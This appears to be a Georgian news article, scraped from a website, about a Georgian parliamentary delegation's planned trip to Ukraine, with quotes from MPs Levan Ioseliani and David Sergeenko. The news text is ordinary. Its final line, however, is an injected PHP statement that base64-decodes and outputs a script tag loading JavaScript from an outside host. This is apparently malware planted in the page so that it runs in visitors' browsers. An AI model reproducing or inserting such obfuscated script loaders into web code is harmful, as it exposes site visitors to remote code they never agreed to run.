celsiusi
ავერსი საქკაბელი
პარტია “მოქალაქეები”–ს ერთ–ერთი ლიდერის, პარლამენტის ვიცე–სპიკერის ლევან იოსელიანის  განცხადებით, საქართველოს საპარლამენტო დელეგაცია უკრაინაში სავარაუდოდ მიმდინარე კვირის ბოლოს გაემგზავრება. ამის შესახებ დეპუტატმა საინფორმაციო სააგენტო BUSINESS TIME-ს განუცხადა. 
 
მისივე თქმით, დეტალებზე ექვს საათზე იქნება საბოლოო შეხვედრისას იმსჯელებენ და გადაწყდება ვინ იქნებიან დელაგაციის შემადგენლობაში. 
 
„დანამდვილებით ვიცი რომ ვიქნები მე, ასევა გიდასტურებთ, რომ იქნება დავით სერგეენკო, ალეკო ელისაშვილი ისედაც იქაა და იქნება. რაც შეეხება დანარჩენებს, არ იქნება სწორი დავასახელო წინასწარ, ვინაიდან შეიძლება შეიცვალოს, მაგრამ შემიძლია გითხრათ , რომ განიხილებიან  „ ერთიანი ნაციონალური მოძრაობიდან“  ხატია დეკანოიძე,  პარტია „სტრატეგია–აღმაშენებელი“–ს ლიდერი გიორგი ვაშაძე და სხვები...
 
ჩვენი სურვილია გამვემგზავროთ კვირის ბოლოს, თუმცა დანამდვილებით ზუსტ თარიღს ვერ გეტყვით, ვინაიდან პროტოკოლურ ნაწილზეც არის დამოკიდებული. „– განაცხადა იოსელიანმა. 
 
ცნობისთვის, დღეს საპარლამენტო უმრავლესობის წევრიმა დავით სერგეენკომ განაცხადა, რომ  საქართველოს საპარლამენტო დელეგაციას არც არასოდეს უთქვამს უარი უკრაინაში  გამგზავრებაზე. – „ პირიქით, ჩვენი ვალდებულებაც არის, რომ ჩავიდეთ უკრაინაში. დღეს იყო კიდევ ერთი სამუშაო შეხვედრა, სადაც ეს საკითხი განვიხილეთ. ახლა მიდის კომუნიკაცია უკრაინულ მხარესთან და დიდი ალბათობით, დელეგაცია გაემგზავრება ამ კვირის ბოლოს, პარასკევს ან შაბათს. ექვს საათზე იქნება საბოლოო შეხვედრა“, – განაცხადა სერგეენკომ. 
 
 
 
 
785
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");